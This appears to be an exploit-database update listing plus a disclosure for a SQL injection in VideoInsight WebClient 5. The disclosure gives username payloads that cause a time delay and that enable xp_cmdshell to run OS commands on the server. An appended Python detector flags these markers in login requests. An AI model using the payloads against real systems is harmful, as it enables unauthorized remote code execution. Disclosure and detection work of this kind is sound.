
11 changes to exploits/shellcodes

Redis 5.0 - Denial of Service
ntp 4.2.8p11 - Local Buffer Overflow (PoC)
Windows 10 - Desktop Bridge Activation Arbitrary Directory Creation Privilege Escalation
Windows 10 - Desktop Bridge Virtual Registry CVE-2018-0880 Incomplete Fix Privilege Escalation
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution
Mirasys DVMS Workstation 5.12.6 - Path Traversal
MaDDash 2.0.2 - Directory Listing
NewMark CMS 2.1 - 'sec_id' SQL Injection
TP-Link TL-WA850RE - Remote Command Execution
Apache CouchDB < 2.1.0 - Remote Code Execution
IPConfigure Orchid VMS 2.0.5 - Directory Traversal Information Disclosure (Metasploit)
VideoInsight WebClient 5 - SQL Injection
# Title: VideoInsight WebClient 5 - SQL Injection
# Date: 2018-05-06
# Author: vosec
# Vendor Homepage: https://www.security.us.panasonic.com/
# Software Link: https://www.security.us.panasonic.com/video-management-software/web-client/
# Version: 5
# Tested on: Windows Server 2008 R2
# CVE: N/A

# Description:
# This exploit is based on CVE-2017-5151 targeting versions prior.
# The txtUserName and possibly txtPassword fields contain an unauthenticated SQL injection vulnerability
# that can be used for remote code execution.

# SQL Injection - PoC
# From the web login page submit the following string as the username with anything in the password field.
# The web server will hang for 5 seconds:

UyYr');WAITFOR DELAY '00:00:05'--

# Remote Code Execution - PoC
# From the web login page submit each of the following strings as the username, one at a time, with anything
# in the password field (with the ping, use a valid IP address that you can monitor):
UyYr');EXEC sp_configure 'show advanced options', 1;RECONFIGURE;--
UyYr');EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
UyYr');EXEC xp_cmdshell 'ping xxx.xxx.xxx.xxx';--
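
# Detection - added example (not part of the original advisory or the vendor's code)
# A defender-side check that flags login POST bodies carrying the stacked-query, time-delay and
# xp_cmdshell markers shown above. It assumes the form fields are posted URL-encoded under the names
# txtUserName and txtPassword; scan_login_body and the sample bodies are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlencode

# Indicators drawn from the strings in the advisory above.
RULES = {
    "stacked_query": re.compile(r"'\s*\)?\s*;"),  # quote closed, then a new statement
    "time_delay": re.compile(r"\bWAITFOR\s+DELAY\b", re.I),
    "sp_configure": re.compile(r"\bsp_configure\b", re.I),
    "xp_cmdshell": re.compile(r"\bxp_cmdshell\b", re.I),
}
HIGH = {"sp_configure", "xp_cmdshell"}   # attempts to reach OS command execution
FIELDS = ("txtUserName", "txtPassword")  # field names from the advisory (assumed POST keys)


def scan_login_body(body):
    """Return {field: (severity, [rule names])} for a URL-encoded login POST body."""
    form = parse_qs(body, keep_blank_values=True)
    findings = {}
    for field in FIELDS:
        for value in form.get(field, []):
            matched = sorted(name for name, rx in RULES.items() if rx.search(value))
            if matched:
                severity = "high" if HIGH & set(matched) else "medium"
                findings[field] = (severity, matched)
    return findings


# Constructed sample bodies (not captured traffic).
SAMPLES = [
    urlencode({"txtUserName": "operator1", "txtPassword": "s3cret;pw"}),
    urlencode({"txtUserName": "o'brien", "txtPassword": "x"}),
    urlencode({"txtUserName": "UyYr');WAITFOR DELAY '00:00:05'--", "txtPassword": "x"}),
    urlencode({"txtUserName": "UyYr');EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--",
               "txtPassword": "x"}),
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(scan_login_body(body) or "clean")
```

# A name containing an apostrophe or a password containing a semicolon is not flagged on its own;
# the stacked_query rule needs the closing quote followed directly by a statement separator.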